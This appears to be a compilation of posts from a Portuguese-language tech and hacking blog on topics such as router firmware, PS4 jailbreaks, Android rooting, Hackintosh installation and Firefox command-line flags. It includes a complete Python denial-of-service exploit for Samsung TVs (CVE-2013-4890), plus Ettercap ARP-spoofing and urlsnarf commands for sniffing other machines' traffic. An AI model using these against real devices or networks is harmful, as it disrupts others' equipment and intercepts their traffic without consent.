Capturando fluxo de rede usando URLSnarf e Ettercap

Todas as técnicas apontadas neste artigo são para uso de estudo. Elas não deve ser utilizadas em ambientes corporativos para não ferir a segurança e privacidade dos usuários

Estou levando em consideração que você tenha o Kali Linux ou que tenha as ferramentas que iremos utilizar em sua máquina:

1) URLSnarf
Abra um terminal e execute o comando:
urlsnarf -i eth0 ( indique a interface de rede de sua máquina )

2) Ettercap
ettercap -Tqi eth0 -M ARP:REMOTE /192.158.0.1/192.168.0.1/
* No modelo acima estamos snifando a máquina com ip 192.168.0.1

A partir deste momento você poderá ver as urls capturadas no terminal do URLSnarf

SIMETBOX – Projeto do NIC.BR desenvolveu uma firmware para roteadores TPLINK que customizam completamente o roteador

screen-shot-2017-01-10-at-5-13-34-pm

O NIC.BR disponibilizou em no site do SIMET uma firmware chamada SIMETBOX que customiza completamente o firmware do roteador. Além de opções avançadas de firewall ele habilita também o roteador WIFI para o modo AD-HOC, Acess Point e ínumeras outras funcionalidades.

Os hardwares compatíveis com o SIMETBOX são:

  • TPLink TL-WR740N (recomendado para usuários comuns, com banda larga de até 50 Mbit/s)
  • TPLink TL-WR841ND (recomendado para usuários comuns, com banda larga de até 50 Mbit/s)
  • TPLink TL-WR1043N (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WDR3600 (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WDR4300 (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WDR4310 (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-WR842N (recomendado para usuários que usam banda larga acima de 50 Mbit/s)
  • TPLink TL-MR3020 (recomendado para medições via wireless)
  • Ubiquiti Nanostation M5

Caso tenha interesse pelo projeto a firmware pode ser baixada pelo link

http://simet.nic.br/firmware/

Alguns pontos importantes é que a firmware vem preparada para o acompanhamento em tempo real da velocidade. O projeto é baseado no kernel open source OpenWRT LUCI 0.11.1.

Nos testes realizados em laboratório é possível destacar as ferramentas de métricas e também de firewall disponíveis na firmware. Vale a pena para quem tem um dos roteadores acima.

Hacking :: Desvendando as máquinas de caça brinquedos

Screen Shot 2016-04-08 at 3.21.29 AM

As máquinas de caça brinquedos é algo que já deve ter levado um bom trocado seu correto? Bom pelo menos eu acredito que gastei um bom dinheiro até hoje e acertei apenas 2 vezes. A frustração levou ao estudo e a fazer um hacking destas máquinas.

A verdade
Em verdade não é só o conhecimento, habilidade com o joystick ou mesmo sorte para se dar bem com estas máquinas. Elas são parametrizadas pelos fabricantes ou mesmo pelo lojista para a quantidade de força na garra X quantidade de tentativas ou mesmo por uma porcentagem na quantidade de acertos para uma porcentagem de erros.

Screen Shot 2016-04-08 at 3.28.27 AM

E como ganhar ?
O software que gerencia estas máquinas são salvos diretamente na firmware do equipamento ou seja não há combinação de joystick que ative o funcionamento.
Resumindo não caia nesta por que é fraude. Assista ao vídeo abaixo e entenda melhor a respeito destas máquinas.

Jailbreak para PS4 ( Playstation 4 desbloqueado )

Um Hacker denominado @CTurte postou no Twitter que conseguiu desbloquear o PS4. A técnica denominada Webkit Exploit foi o que possibilitou que o CTurt tivesse acesso a raiz do sistema como podem ver pelo PS4 Explorer. Isto ainda não quer dizer que os usuários podem ter acesso a rodar jogos piratas como aconteceu no PS2 e PS3.

Até o momento eles encontraram uma forma de rodar aplicativos sem assinatura ( homebrews ).

Screen Shot 2015-12-13 at 8.33.20 PM

Mais informações:
https://twitter.com/CTurtE
http://wololo.net/

As minhas primeiras impressões do PS4

PS4-IMG_0434Nesta semana peguei o Play Station 4 e comecei os testes. De cara vi que o console possui uma capacidade de processamento de GPU fantástica mas percebi alguns pontos negativos no console.

– O console não possui um sistema de Media Center
Com um HD de 500 GB ele resolveria minha vida pois tenho uns 20GB de fotos em meu querido PS3. Ou seja não posso aponsentar de vez o PS3;

– O console não possui suporte a servidores DLNA
No PS3 a possibilidade de executar em minha rede interna em casa os conteúdos que estão em meu servidor é algo fantástico no PS3. Já no PS4 a Sony deixou claro que não funciona.
Na página sobre o assunto a Sony diz que em contra-partida eles disponibilizam ótimos serviços de streaming como Netflix e Sony Music que podem ser utilizados para este fim $$$$;

– Jogos
A Microsoft além de ter investido uma grana legal em marketing e publicidade no Brasil, também preparou títulos que fazem valer a pena comprar o console. A Sony disponibilizou até o momento 04 títulos Tomb Raider, Assassins Creed Black Flag ( disponível também no PS3 ), Call of Dutty e Fifa 14.

Nenhum jogo exclusivo que traga a “necessidade” de comprar o console foi lançado

RESUMO:
É um console poderoso que estará redondo daqui uns 02 anos. Os hackers terão muito trabalho para criar aplicativos que tornem o console ainda mais interessante pois os Apps nativos sinceramente são brochantes

Exploit para Samsung Smartv possibilita resetar tv pela rede

Segundo os integrantes do site Itsecgames o exploit que eles desenvolveram possiblita resetar aparalhos smartv quando conectados na mesma rede do agressor. O script em Python é simples e usa a biblioteca httplib para explorar a vulnerabilidade da TV. O código para que possa ser analisado para fins de estudo está abaixo:

#!/usr/bin/python

# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
# As a results, the TV reboots...
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)

import httplib
import sys
import os

print " ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print " Exploit: Denial of Service (DoS) attack\n"
print " Description:\n"
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print " ***************************************************************************************\n"

# Sends the payload
print " Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

# Checks the response
print " Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
if response != 0:
print " Target down!\n"

 

Um Hackintosh a altura! Customizando gabinete do Powermac G5 para um hackintosh

hackintosh

Depois do lançamento do novo gabinete do novo MacPro veio a ideia de um novo projeto pessoal. Preparar um Hackintosh de verdade utilizando um gabinete de aço do velho PowerMac G5. O gabinete é fantástico, além de ter muito espaço, refrigeração ele é muito mais estiloso que o novo gabinete black do MacPro.

Custo do projeto
R$ 1.350,00
Continue reading

Habilitando Root no LG Optimus E455F

Pré-Requisitos para Root Optimus L3

Na raiz de seu Optimus L3 estas são coisas que você precisa.

Baixe a ferramenta do root para o Windows http://www.mediafire.com/?i7fv18n0iupvrt8

Você tem que habilitar a depuração USB no aparelho. Para fazer isso você tem que ir para a opção de configuração – Aplicativos – desenvolvimento

Certifique-se que o dispositivo tem uma carga de pelo menos 60%, eu recomendo que você tenha pelo menos 90% para ser seguro.

Como Root Optimus L3

Extraia a ferramenta que está no arquivo zip que você baixou.

Você tem que instalar os drivers LG

Conecte o seu aparelho via USB ao computador.

Execute o arquivo “run.bat”

Siga as instruções que apareceram no pront de comando

Espere até este ficar concluído.

NOTA: Seu aparelho vai reiniciar umas 3 ou 4 vezes quando o programa estiver fazendo o root

Flying RC Aircraft Carrier Porta aviões

Você já deve ter visto muitos Quad-copteros por ai e vários deles aqui no blog correto ? Agora imagine um porta aviões construído em cima da estrutura de um quad-coptero.

É simplesmente fantástico

Estou segundo vídeo ainda falando de Quad-copteros, vocês poderão conferir a semelhance com a Nave Hunter Killer do Terminator 4

Instalando o Mac OS X Lion em seu PC sem complicação

Primeiramente gostaria de parabenizar o projeto iATKOS pelo projeto iATKOS L2 que porta o OSX Lion 10.7.2 com Kernel com patch para rodar em máquinas com processadores Core 2 Duo.

Como sempre há diversos tutoriais explicando como fazer para instalar o OSX no PC rodando através da técnica de instalar com um pendrive e depois aplicar os patchs no kernel do Lion manualmente. Felizmente já temos uma ISO preparada com os patchs aplicados para que vocês possam utilizar com facilidade.

Veja abaixo o que será necessário para instalação do iATKOS L2M

Baixar a versão iATKOS L2M para PC no link abaixo
http://bubot.com/aab2a

Hardware:
Para nossos testes utilizamos uma placa mãe com chipset Intel 82801G
Processador Intel Core 2 Duo 2.4 Ghz
Memória 4 GB DDR2 800MHZ
Placa de vídeo GeForce 8400 GS 256 MB ( aqui está o segredo )
Placa de rede onboard RTL 8111 Gibabit Ethernet
Placa de áudio onboard 82801G ICH7 High Definition Audio controller ( compatível com o antido Azalia Audio Driver até a versão 10.6.8 )

Instalando
Vamos direto ao ponto. Levando em consideração que você saiba baixar o torrent e queimar em um DVD de 4.7GB

– Comece a instalação selecionando o idioma de instalação;
– Particione seu HD de forma que a partição do sistema tenha pelo menos 20 GB para instalação do sistema + aplicativosl;
– É necessário que seu HD esteja particionado com a opção de boot como Apple Guided partition;
– Selecione o botão Custom e adicione as seguintes opções;
/ Video / Nvidia / NVenabler
/ Network / Wired ( pode deixar selecionado todas opções, insto facilita caso adicione uma nova placa no futuro )
/ Bootloader / Chimera

OBS: Não iremos adicionar nenhum Kext de áudio neste momento. Após finalizar a instalação em algumas vezes é possível que o sistema apresente um Kernel Panic, caso isto aconteça selecione o modo -v no Chamaleon boot loader para termos ideia do que acontece.

Caso seu sistema tenha instalado normalmente, vamos instalar o último KEXTS que precisamos que é o de áudio. O Kext Azalia Audio Hight Definition compatível com o Snow Leopard não funciona no Lion L2M. Você pode escolher o KEXT VoodooHDA 2.5.3 que irá funcionar.

Preparei um kit para vocês com o Kext Voodoo e o Kext Wizard para fazer a instalação.

Baixe o Kit em http://bubot.com/fbd79

Descompacte o arquivo e depois descompacte o arquivo 189-VoodooHDA 2.5.3 Snow Leopard.zip. Abra o aplicativos Kext Wizard, clique na aba installation que fica no parte superior do aplicativo e depois clique em Browse para selecionar o Kext do Voodo que acabamos de descompactar. Selecione o caminho do arquivo e clique em Install.

Depois de concluir a instalação vá até a aba Maintenance e clique em System/Library/Extension/Repair permissions / Rebuild cache e clique em execute.

Depois de finalizar reinicie seu computador.

Se a instalação correu tranquilamente seu OSX Lion X86 estará pronto para utilização. Para dúvida utilizem os comentários.

Obrigado

Download Multibeast


MultiBeast é uma ferramenta all-in-one para pós-instalação e projetada para permitir que boot a de qualquer disco disco rígido e com possibilidade de instalação com suporte para áudio, rede, e Graphics. Ele contém dois diferentes. Além disso, o utilitário server também para recuperação de sistema como reconstruação de caches e permissões.

Continue reading

Usando o Firefox na linha de comando

Neste post você aprenderá como utilizar o Mozilla Firefox através da linha de comando. Criei este post apenas como curiosidade e caso alguém precise futuramente que faça bom proveito.

Mac OS X

Abra o terminal encontre a pasta do binário do Firefox em /Applications/Firefox.app/Contents/MacOS/firefox e entre com o seguinte comando

/Applications/Firefox.app/Contents/MacOS/firefox -ProfileManager

Veja abaixo a lista de comandos possíveis e suas respectivas flags

CommandResultExample
profile “<path>”Starts with profile located at the given path.
Does not apply to Mozilla Suite/SeaMonkey 1.x
firefox.exe -profile “E:\myprofile”
P “<profile name>”Starts with a given profile name (profile name is case sensitive).firefox.exe -P “Joel User”
<url>Launches the application and opens the given URL(s).firefox.exe “www.mozilla.org” “www.mozillazine.org”
safe-modeLaunches the application with extensions disabled and the default theme.
Does not apply to Mozilla Suite/SeaMonkey 1.x
firefox.exe -safe-mode
no-remoteEnables running multiple instances of the application with different profiles; [1] used with -P
Does not apply to Mozilla Suite/SeaMonkey 1.x
firefox.exe -no-remote
height <value>Sets height of the startup window to <value>.firefox.exe -height 600
width <value>Sets width of the startup window to <value>.firefox.exe -width 800
ProfileManagerStarts with Profile Manager.firefox.exe -ProfileManager
CreateProfileCreate a new profilefirefox -CreateProfile test
migrationStarts the application with the Import Wizard
Does not apply to Mozilla Suite/SeaMonkey 1.x
firefox -migration
consoleStarts the application with a debugging console.firefox.exe -console
jsconsoleStarts with the Error Console (Javascript Console).firefox.exe -jsconsole
inspector <url>Starts with the DOM Inspector.firefox.exe -inspector http://www.google.com/
chrome <url>Loads the specified chrome.firefox.exe -chrome chrome://inspector/content/inspector.xul
new-window <url>Loads a URL in a new browser window.firefox.exe -new-window <url>
new-tab <url>Loads a URL in a new tab.firefox.exe -new-tab <url>
install-global-extension “<path>”Installs an extension globally.firefox.exe -install-global-extension “C:\Temp\extension-file.xpi”

Hacker invade emissora de TV ao Vivo

Suposto vídeo de hacker alterando o texto do tele prompter de uma programa de TV ao vivo é publicado na internet

Outro vídeo do Hacker invadindo o painel da estação Central en NY

Enviando mensamgem SMS para todas as mulheres de um bar

Invadindo o sistema de trânsito e enviando mensagens

Fake ? Dê sua opinião.

Quem são os Anonymous ? O que ainda está por vir ?

Anonymous é um clã de hackers espalhados pelo mundo que têm como objetivo fazer protestos sobre diversos assuntos que estão presentes na sociedade utilizando o meio digital.

Para muitos os Anonymous sairam da Deep Web o mundo oculto por que existe na rede para firmar sua posição e objetivos na sociedade.

Não somos a favor de qualquer tipo de ataque que prejudique os dados de qualquer empresa ou entidade, nem temos nenhuma relação com o grupo porém é importante analisar os ataques do grupo Anonymous. Diferente de Estelionatários que usam os ataques do tipo phishing, spammers ou espionagem industrial para fins lucrativos com os propósitos firmados pelo grupo.

Há uma falta de experiência enorme da mídia em relação a este assunto. Acho importante a pesquisa e estudo em relação ao assunto pois principalmente no Brasil ficou evidente que estamos totalmente despreparados para lidar com este tipo de assunto, tanto júridicamente quanto tecnológicamente.

Vídeos sobre os Anonymous

Quem são os Anonymous ?

A falta de experiência da Globo para noticiar as ações dos ataques que ocorreram no Brasil que segundo eles são os “Piradas da internet”

Mais um documentário sobre os Anonymous

Cobertura da Band para os eventos contra o governo

O que você pensa sobre o assunto ? Qual sua posição ? Deixe seu comentário